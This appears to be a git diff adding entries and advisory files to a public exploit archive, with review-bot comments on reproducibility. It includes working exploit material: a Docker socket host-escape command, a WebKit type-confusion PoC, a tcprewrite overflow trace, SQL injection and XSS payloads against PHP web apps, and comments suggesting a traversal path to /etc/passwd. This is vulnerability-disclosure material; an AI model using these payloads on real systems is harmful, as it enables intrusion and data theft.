diff --git a/files.csv b/files.csv
index 062320666..09d41e199 100644
--- a/files.csv
+++ b/files.csv
@@ -5667,6 +5667,8 @@ id,file,description,date,author,platform,type,port
 42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
 42600,platforms/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",linux,dos,0
 42602,platforms/multiple/dos/42602.html,"IBM Notes 8.5.x/9.0.x - Denial of Service",2017-09-02,"Dhiraj Mishra",multiple,dos,0
+42652,platforms/linux/dos/42652.txt,"tcprewrite - Heap-Based Buffer Overflow",2017-09-11,FarazPajohan,linux,dos,0
+42666,platforms/multiple/dos/42666.txt,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization",2017-09-12,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9199,6 +9201,7 @@ id,file,description,date,author,platform,type,port
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
+42356,platforms/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",linux,local,0
 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
 42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
@@ -9231,6 +9234,7 @@ id,file,description,date,author,platform,type,port
 42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-06,mr_me,windows,local,0
 42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
 42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
+42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver <= 12.4.0 - Kernel Pool Overflow",2017-09-12,mr_me,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
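Review bot: The new 42665 entry is indistinguishable from the existing 42624 entry three lines above it except for `<=` versus `<` and the dropped words `Privilege Escalation`, although 42665.py's own header later in this commit describes a privilege-escalation exploit for the same driver and the same upper bound (`Affected: <= v12.4.0`, CVE-2017-14344). Anyone browsing the index cannot tell which of the two pool-overflow entries is which. Using the distinguishing detail the new file gives, e.g. `"Jungo DriverWizard WinDriver <= 12.4.0 - 'IOCTL 0x95382673' Kernel Pool Overflow Privilege Escalation"`, would keep the title consistent with 42624/42625 and still unique.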
@@ -37548,7 +37552,7 @@ id,file,description,date,author,platform,type,port
 40804,platforms/php/webapps/40804.txt,"WordPress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0
 40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0
 40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0
-40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
+40826,platforms/php/webapps/40826.py,"osTicket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
 40895,platforms/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,multiple,webapps,0
 40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0
 40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080
@@ -38433,3 +38437,14 @@ id,file,description,date,author,platform,type,port
 42648,platforms/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps,0
 42649,platforms/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps,0
 42651,platforms/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps,0
+42653,platforms/php/webapps/42653.txt,"PHP Dashboards NEW 4.4 - Arbitrary File Read",2017-09-11,"Ihsan Sencan",php,webapps,0
+42654,platforms/php/webapps/42654.txt,"PHP Dashboards NEW 4.4 - SQL Injection",2017-09-11,"Ihsan Sencan",php,webapps,0
+42655,platforms/php/webapps/42655.txt,"JobStar Monster Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42656,platforms/php/webapps/42656.txt,"iTech Book Store Script 2.02 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42657,platforms/php/webapps/42657.txt,"iTech StockPhoto Script 2.02 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42658,platforms/php/webapps/42658.txt,"EduStar Udemy Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42659,platforms/php/webapps/42659.txt,"AirStar Airbnb Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,php,webapps,0
+42660,platforms/php/webapps/42660.txt,"osTicket 1.10 - SQL Injection",2017-09-12,"Mehmet Ince",php,webapps,0
+42661,platforms/php/webapps/42661.txt,"FoodStar 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
+42662,platforms/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
+42663,platforms/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/linux/dos/42652.txt
new file mode 100755
index 000000000..48185c067
--- /dev/null
+++ b/platforms/linux/dos/42652.txt
@@ -0,0 +1,83 @@
+################
+#Title: tcprewrite Heap-Based Buffer Overflow
+#CVE: CVE-2017-14266
+#CWE: CWE-122
+#Exploit Author: Hosein Askari(FarazPajohan)
+#Vendor HomePage: http://tcpreplay.synfin.net/
+#Product Description: When you want to give a PCAP file to someone, it gives away certain sensitive information such as an organizations internal IP range,
+IP addresses of sensitive company assets, MAC addresses of critical hardware that could identify the product vendors. Tcprewrite is a security tool to rewrite packets stored
+in PCAP file format, such as created by tools such as tcpdump and ethereal.
+#Version : 3.4.4 Released under the Free BSD License
+#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)
+#Date: 11-09-2017
+#Category: Application
+#Author Mail : hosein.askari@aol.com
+#Description: tcprewrite in Tcpreplay 3.4.4 has a Heap-Based Buffer Overflow vulnerability triggered by a crafted PCAP file can cause a memory corruption and potential code execution.
+###############
+#First we make a crafted file and send it to the network and capture its information by wireshark.
+~Step 1:
+sudo echo -ne '\x63\x72\x61\x66\x74\x65\x64\x20\x66\x69\x6c\x65\x20\x69\x73\x20\x6d\x61\x64\x65\x20\x62\x79\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=200 of=tcp3.txt
+~Step 2(Sending the information and capturing by wireshark):
+import os
+for i in range(1,20):
+ os.system("cat tcp3.txt | nc 127.0.0.1 21")
+~Step 3(Using tcprewrite):
+sudo tcprewrite --portmap=21:2121 --infile=tcp.pcap --outfile=output.pcap
+################
+#POC:
+constantine@constantine:~/Downloads/DrMemory-Linux-1.11.0-2/bin$ sudo ./drmemory -- tcprewrite --portmap=21:2121 --infile=tcp.pcap --outfile=output.pcap
+~~Dr.M~~ Dr. Memory version 1.11.0
+~~Dr.M~~ WARNING: application is missing line number information.
+~~Dr.M~~ +~~Dr.M~~ Error #1: UNADDRESSABLE ACCESS beyond heap bounds: writing 0x080d458f-0x080d4590 1 byte(s) within 0x080d458c-0x080d4590 +~~Dr.M~~ # 0 replace_memcpy [/work/drmemory_package/drmemory/replace.c:246] +~~Dr.M~~ # 1 tcprewrite!? +0x0 (0x0804ae59 ) +~~Dr.M~~ # 2 tcprewrite!? +0x0 (0x08049f91 ) +~~Dr.M~~ # 3 tcprewrite!? +0x0 (0x0804a1a1 ) +~~Dr.M~~ Note: @0:00:01.045 in thread 2521 +~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af +~~Dr.M~~ Note: instruction: mov %eax -> (%ebx) +~~Dr.M~~ +~~Dr.M~~ Error #2: UNADDRESSABLE ACCESS beyond heap bounds: writing 0x080d459c-0x080d459d 1 byte(s) +~~Dr.M~~ # 0 replace_memcpy [/work/drmemory_package/drmemory/replace.c:252] +~~Dr.M~~ # 1 tcprewrite!? +0x0 (0x0804ae59 ) +~~Dr.M~~ # 2 tcprewrite!? +0x0 (0x08049f91 ) +~~Dr.M~~ # 3 tcprewrite!? +0x0 (0x0804a1a1 ) +~~Dr.M~~ Note: @0:00:01.047 in thread 2521 +~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af +~~Dr.M~~ Note: instruction: mov %dl -> (%eax) +~~Dr.M~~ +~~Dr.M~~ Error #3: UNADDRESSABLE ACCESS beyond heap bounds: reading 0x080d458f-0x080d4591 2 byte(s) within 0x080d458d-0x080d4591 +~~Dr.M~~ # 0 libc.so.6!__GI___mempcpy [../sysdeps/i386/i686/multiarch/../mempcpy.S:54] +~~Dr.M~~ # 1 libc.so.6!__GI__IO_default_xsputn [/build/glibc-KM3i_a/glibc-2.23/libio/genops.c:438] +~~Dr.M~~ # 2 libc.so.6!_IO_new_file_xsputn [/build/glibc-KM3i_a/glibc-2.23/libio/fileops.c:1352] +~~Dr.M~~ # 3 libc.so.6!__GI__IO_fwrite [/build/glibc-KM3i_a/glibc-2.23/libio/iofwrite.c:39] +~~Dr.M~~ # 4 libpcap.so.0.8!pcap_dump +0x5f (0xb79f1100 ) +~~Dr.M~~ # 5 tcprewrite!? +0x0 (0x0804adc6 ) +~~Dr.M~~ # 6 tcprewrite!? +0x0 (0x08049f91 ) +~~Dr.M~~ # 7 tcprewrite!? 
+0x0 (0x0804a1a1 ) +~~Dr.M~~ Note: @0:00:01.071 in thread 2521 +~~Dr.M~~ Note: next higher malloc: 0x080d45b0-0x080e45af +~~Dr.M~~ Note: instruction: rep movs %ds%esi) %esi %edi %ecx -> %es%edi) %esi %edi %ecx +~~Dr.M~~ +~~Dr.M~~ Error #4: LEAK 8 direct bytes 0x080c3168-0x080c3170 + 0 indirect bytes +~~Dr.M~~ # 0 replace_malloc [/work/drmemory_package/common/alloc_replace.c:2576] +~~Dr.M~~ # 1 tcprewrite!? +0x0 (0x08059e6c ) +~~Dr.M~~ # 2 tcprewrite!? +0x0 (0x0804ea21 ) +~~Dr.M~~ # 3 tcprewrite!? +0x0 (0x0804c264 ) +~~Dr.M~~ # 4 tcprewrite!? +0x0 (0x08049e0c ) +~~Dr.M~~ # 5 tcprewrite!? +0x0 (0x0804a1a1 ) + diff --git a/platforms/linux/local/42356.txt b/platforms/linux/local/42356.txt new file mode 100755 index 000000000..37bc88023 --- /dev/null +++ b/platforms/linux/local/42356.txt @@ -0,0 +1,21 @@ +# Exploit Title: Docker Daemon - Unprotected TCP Socket +# Date: 20-07-2017 +# Exploit Author: Martin Pizala +# Vendor Homepage: https://www.docker.com +# Software Link: https://www.docker.com/get-docker +# Version: Since 0.4.7 (2013-06-28) (feature: mount host directories) +# Tested on: Docker CE 17.06.0-ce and Docker Engine 1.13.1 + +1. Description + +Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container and use chroot to escape the container-jail. + +2. Proof of Concept + +docker -H tcp://: run --rm -ti -v /:/mnt alpine chroot /mnt /bin/sh + +3. Solution: + +Protect the tcp socket +https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket +https://docs.docker.com/engine/security/https/ \ No newline at end of file diff --git a/platforms/multiple/dos/42666.txt b/platforms/multiple/dos/42666.txt new file mode 100755 index 000000000..29180abfc --- /dev/null +++ b/platforms/multiple/dos/42666.txt 
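Review bot: The PoC cannot be reproduced from the steps as written: Step 1 writes `tcp3.txt`, Step 2 pipes it to `nc 127.0.0.1 21` (nothing is shown listening there), but Step 3 and the Dr. Memory run consume `tcp.pcap`, which no listed step produces — the Wireshark capture exists only in prose. Attaching the crafted pcap itself (or a base64 blob of it) would make the overflow reproducible; note also that `sudo echo ... | dd` elevates only `echo`, not the `dd` that writes the file. What the trace actually shows is two 1-byte out-of-bounds heap writes in `memcpy` reached from an unsymbolized `tcprewrite` frame at 0x0804ae59 and a 2-byte OOB read under `pcap_dump`, so the "potential code execution" claim in the description should be hedged as unconfirmed rather than stated as fact.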
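Review bot: The PoC line `docker -H tcp://: run ...` has lost its host and port and cannot be run as written; it should read `docker -H tcp://<host>:2375 run --rm -ti -v /:/mnt alpine chroot /mnt /bin/sh`. The Solution section links to the daemon and TLS docs but never says the one setting that closes the hole: the daemon must run with `--tlsverify` (plus `--tlscacert/--tlscert/--tlskey`) so client certificates are checked, since, as the description itself notes, `--tls` without verification on 2376/tcp still lets any client mount `/`. It is also worth stating that the `chroot` step is cosmetic — `-v /:/mnt` alone already grants read/write access to every host file, so any reachable daemon socket is equivalent to root on the host.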
@@ -0,0 +1,80 @@
+Let's start with JS code.
+
+let o = {};
+for (let i in {xx: 0}) {
+ o[i]; <<-------- (a)
+}
+
+When the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.
+
+Here's the code of BytecodeGenerator::emitGetByVal.
+
+RegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)
+{
+ for (size_t i = m_forInContextStack.size(); i > 0; i--) {
+ ForInContext& context = m_forInContextStack[i - 1].get();
+ if (context.local() != property)
+ continue;
+
+ if (!context.isValid())
+ break;
+
+ if (context.type() == ForInContext::IndexedForInContextType) {
+ property = static_cast(context).index();
+ break;
+ }
+
+ ASSERT(context.type() == ForInContext::StructureForInContextType);
+ StructureForInContext& structureContext = static_cast(context);
+ UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);
+ instructions().append(kill(dst));
+ instructions().append(base->index());
+ instructions().append(property->index());
+ instructions().append(structureContext.index()->index());
+ instructions().append(structureContext.enumerator()->index());
+ instructions().append(profile);
+ return dst;
+ }
+
+ UnlinkedArrayProfile arrayProfile = newArrayProfile();
+ UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);
+ instructions().append(kill(dst));
+ instructions().append(base->index());
+ instructions().append(property->index());
+ instructions().append(arrayProfile);
+ instructions().append(profile);
+ return dst;
+}
+
+The method uses op_get_by_val to handle expressions like "o[i]". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that "i" will be a string("xx") semantically. Therefore, it will use op_get_direct_pname to handle it.
+
+Here's another example.
+
+let o = {};
+for (let i in {xx: 0}) {
+ o[i]; <<-------- (a)
+ i = 0x123456; <<-------- (b)
+ o[i]; <<-------- (c)
+}
+
+In this case, it will use op_get_direct_pname at (a). And at (b), since the index variable "i" is replaced, the invalidate method of the ForInContext object that makes "context.isValid()" return false is called. So, op_get_by_val will be used at (c).
+
+But the problem is that it can't properly handle the following case which cause a type confusion.
+
+let o = {};
+for (let i in {xx: 0}) {
+ for (let j = 0; j < 2; j++) {
+ o[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.
+ i = 0;
+ }
+}
+
+PoC:
+let o = {};
+for (let i in {xx: 0}) {
+ for (let j = 0; j < 2; j++) {
+ o[i];
+ i = new Uint32Array([0, 1, 0x777777, 0, 0]);
+ }
+}
+
diff --git a/platforms/php/webapps/42653.txt
new file mode 100755
index 000000000..af5809b31
--- /dev/null
+++ b/platforms/php/webapps/42653.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: PHP Dashboards NEW 4.4 - Arbitrary File Read
+# Dork: N/A
+# Date: 11.09.2017
+# Vendor Homepage: http://dataninja.biz/
+# Software Link: https://codecanyon.net/item/php-dashboards-v40-collaborative-social-dashboards/19314871
+# Demo: http://phpdashboardv4.dataninja.biz/
+# Version: 4.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to arbitrary file read.
+#
+# Proof of Concept:
+#
+# 1
+# http://localhost/[PATH]/php/file/read.php?filename=[FILE]
+#
+# 2
+# http://localhost/[PATH]/php/file/readxls.php?filename=[FILE]
+# http://localhost/[PATH]/php/file/PHPReader/temp/[.......].xls
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42654.txt
new file mode 100755
index 000000000..b69bfb048
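Review bot: The quoted `emitGetByVal` listing has lost the template arguments of both `static_cast` calls, so `property = static_cast(context).index();` and `StructureForInContext& structureContext = static_cast(context);` are not valid C++; presumably they were `static_cast<IndexedForInContext&>(context)` and `static_cast<StructureForInContext&>(context)` and the angle-bracket text was stripped on the way in. The advisory also names no affected WebKit revision, no fix, and no observed outcome for the final PoC, so a reader cannot tell which builds still emit `op_get_direct_pname` for the inner loop or what to expect when running it. A one-line note under the PoC stating the observed result (crash signature or sanitizer report) and the tested revision would make it verifiable.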
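Review bot: The file-read PoC gives only `filename=[FILE]` and does not say whether `php/file/read.php` needs a traversal prefix or whether either endpoint is reachable without a login, which is what decides the severity of an arbitrary read. The second case is unclear as well: the `PHPReader/temp/[.......].xls` URL appears to be where `readxls.php` leaves its converted output, but the text does not say that, nor whether the temp file name is predictable. Adding the value actually tested, e.g. `filename=../../../../etc/passwd` if that is what was used, plus one sentence on authentication and on how the temp name is derived, would make the finding reproducible.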
--- /dev/null
+++ b/platforms/php/webapps/42654.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: PHP Dashboards NEW 4.4 - SQL Injection
+# Dork: N/A
+# Date: 11.09.2017
+# Vendor Homepage: http://dataninja.biz/
+# Software Link: https://codecanyon.net/item/php-dashboards-v40-collaborative-social-dashboards/19314871
+# Demo: http://phpdashboardv4.dataninja.biz/
+# Version: 4.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/php/share/save.php?dashID=[SQL]
+#
+# http://localhost/[PATH]/php/save/db.php?dashID=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42655.txt
new file mode 100755
index 000000000..fc74bfc99
--- /dev/null
+++ b/platforms/php/webapps/42655.txt
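Review bot: `dashID=[SQL]` is a placeholder rather than a proof: the advisory shows no injection type, no working payload, and does not say whether `php/share/save.php` and `php/save/db.php` are reachable before login. The 8bitsec advisories in this same commit include sqlmap's `Type/Title/Payload` triple; the equivalent here, e.g. `dashID=1 AND SLEEP(5)` with the observed delay, would make the finding verifiable and tell the vendor which statement to parameterize.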
@@ -0,0 +1,35 @@
+# Exploit Title: JobStar Monster Clone Script v1.0 - SQL Injection
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://www.abservetech.com/
+# Software Link: https://www.abservetech.com/jobstar-monster-clone/
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+JobStar is a Monster Clone that enables you to build your own Online Job Portal website in a "few hours" and become fully operational in just a day.
+
+Technical Details & Description:
+================================
+
+Blind SQL injection on [id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+http://localhost.com/[path]/jobdetailshow?id=19 and 1=1
+
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: id=19 and 4297=4297
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42656.txt
new file mode 100755
index 000000000..ed9b00655
--- /dev/null
+++ b/platforms/php/webapps/42656.txt
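Review bot: A boolean-based blind PoC needs both a true and a false case, and this one gives only `id=19 and 1=1`; adding `id=19 and 1=2` and a sentence on how the two responses differ lets a reader confirm the differential instead of trusting the sqlmap summary. The URL also carries unencoded spaces, so `id=19%20and%201=1` is what actually goes over the wire, and `localhost.com` in the PoC host looks like a typo for `localhost`.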
@@ -0,0 +1,47 @@
+# Exploit Title: iTech Book Store Script v2.02 - SQL Injection / Reflected XSS
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://itechscripts.com/
+# Software Link: http://itechscripts.com/book-store-script
+# Version: 2.02
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+This is a robust platform for the booksellers and bookshop owners.
+
+Technical Details & Description:
+================================
+
+SQL injection on [id] parameter.
+
+Reflected XSS on [id] parameter
+
+Proof of Concept (PoC):
+=======================
+
+SQLi:
+
+http://localhost/[path]/book_details.php?id=[SQLi]
+
+Parameter: id (GET)
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: id=2 AND SLEEP(5)-- uUqP
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 1 column
+ Payload: id=-7869 UNION ALL SELECT CONCAT(0x7170717071,0x546c4d4e535a5262584f446466626e67625656687561614b687764535a6c574a4b64454666564173,0x71766b7671)-- PYKD
+
+Reflected XSS:
+
+http://localhost/[path]/book_details.php?id=%3C/scRipt/--!%3E\x3csVg/%3CsVg/oNloAd=alert(document.domain)//%3E\x3e
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42657.txt
new file mode 100755
index 000000000..4e73ac356
--- /dev/null
+++ b/platforms/php/webapps/42657.txt
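Review bot: The advisory title and body report both a SQL injection and a reflected XSS on `book_details.php?id`, but the files.csv entry added in this same commit lists 42656 only as `"iTech Book Store Script 2.02 - SQL Injection"`; the index should carry `SQL Injection / Reflected XSS` as the file does. The XSS payload's literal `\x3c`/`\x3e` sequences are JavaScript string escapes, not URL encoding, so they only matter if `id` is reflected inside a JS string — the advisory should say where in the page the reflection lands. On the SQLi side, the `id=-7869 UNION ...` payload shows an unquoted numeric context, which is worth stating so the vendor can find the query.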
@@ -0,0 +1,35 @@
+# Exploit Title: iTech StockPhoto Script v2.02 - SQL Injection
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://itechscripts.com/
+# Software Link: http://itechscripts.com/stockphoto-script
+# Version: 2.02
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+This is a versatile script to help you launch a stock photo website like Sutterstock.
+
+Technical Details & Description:
+================================
+
+Blind SQL injection on [stock] POST parameter.
+
+Proof of Concept (PoC):
+=======================
+
+The parameter is sent when downloading an image.
+
+Parameter: stock (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: stock=19 AND 9771=9771
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42658.txt
new file mode 100755
index 000000000..083a458dc
--- /dev/null
+++ b/platforms/php/webapps/42658.txt
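Review bot: The PoC names the `stock` POST parameter but gives no endpoint path and no request, only "sent when downloading an image", so neither a reader nor the vendor can locate or reproduce the injection. A minimal request — `POST /[path]/<download endpoint>` with body `stock=19 AND 9771=9771` and the false case `stock=19 AND 9771=9772` — plus a note on whether downloading requires an account would make it verifiable.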
@@ -0,0 +1,39 @@
+# Exploit Title: EduStar Udemy Clone Script v1.0 - SQL Injection
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://www.abservetech.com/
+# Software Link: https://www.abservetech.com/edustar-udemy-clone/
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+EduStar Udemy Clone Script
+
+Technical Details & Description:
+================================
+
+Blind SQL injection on [course_id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+http://localhost/[path]/courses/details?course_id=105 and 1=1
+
+Parameter: course_id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: course_id=105 AND 4868=4868
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: course_id=105 AND SLEEP(5)
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42659.txt
new file mode 100755
index 000000000..9b0f60f2c
--- /dev/null
+++ b/platforms/php/webapps/42659.txt
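Review bot: Only the true case `course_id=105 and 1=1` is shown for a boolean-blind claim; the false case `course_id=105 and 1=2` and the visible response difference are what actually demonstrate the injection. The time-based payload `course_id=105 AND SLEEP(5)` is the stronger evidence here and could be stated with the observed delay. The URL spaces should be `%20`-encoded so the PoC shows the request as sent.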
@@ -0,0 +1,34 @@
+# Exploit Title: AirStar Airbnb Clone Script v1.0 - SQL Injection
+# Date: 2017-09-11
+# Exploit Author: 8bitsec
+# Vendor Homepage: https://www.abservetech.com/
+# Software Link: https://www.abservetech.com/airstar-airbnb-clone/
+# Version: 1.0
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+
+Release Date:
+=============
+2017-09-11
+
+Product & Service Introduction:
+===============================
+AirStar Airbnb Clone Script
+
+Technical Details & Description:
+================================
+
+Blind SQL injection on [room_id] parameter.
+
+Proof of Concept (PoC):
+=======================
+
+http://localhost/[path]/airstar/hotel/roomsedit/detailedroom/6 AND 8995=8995?mem_count=1&check_in=&check_out=&search_city=Madurai,India&min_amt=10&max_amt=150&inout=0
+
+Parameter: #1 (URI)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+
+==================
+8bitsec - [https://twitter.com/_8bitsec]
\ No newline at end of file
diff --git a/platforms/php/webapps/42660.txt
new file mode 100755
index 000000000..33b0c83be
--- /dev/null
+++ b/platforms/php/webapps/42660.txt
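Review bot: The PoC injects into a URL path segment (`.../detailedroom/6 AND 8995=8995?...`), yet the summary calls the parameter `room_id`, the sqlmap block calls it `#1 (URI)`, and the `Payload:` line present in the sibling advisories is missing. The text should say that the injectable value is the `detailedroom/<id>` segment (which the router presumably maps to `room_id` — worth confirming), encode the spaces as `%20`, and give the false case `6 AND 8995=8996` with the response difference. The long query string after the injection point looks like unrelated search state and could be noted as such so readers do not take it for part of the payload.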
@@ -0,0 +1,42 @@
+1. ADVISORY INFORMATION
+========================================
+Title: osTicket v1.10 Unauthenticated SQL Injection
+Application: osTicket
+Bugs: SQL Injection
+Class: Sensitive Information disclosure
+Remotely Exploitable: Yes
+Authentication Required: NO
+Versions Affected: <= v1.10
+Technology: PHP
+Vendor URL: http://osticket.com/
+CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
+Date of found: 12 Sep 2017
+Author: Mehmet Ince
+Advisory:
+https://pentest.blog/advisory-osticket-v1-10-unauthenticated-sql-injection/
+
+2. CREDIT
+========================================
+This vulnerability was identified during penetration test
+by Mehmet INCE from PRODAFT / INVICTUS
+
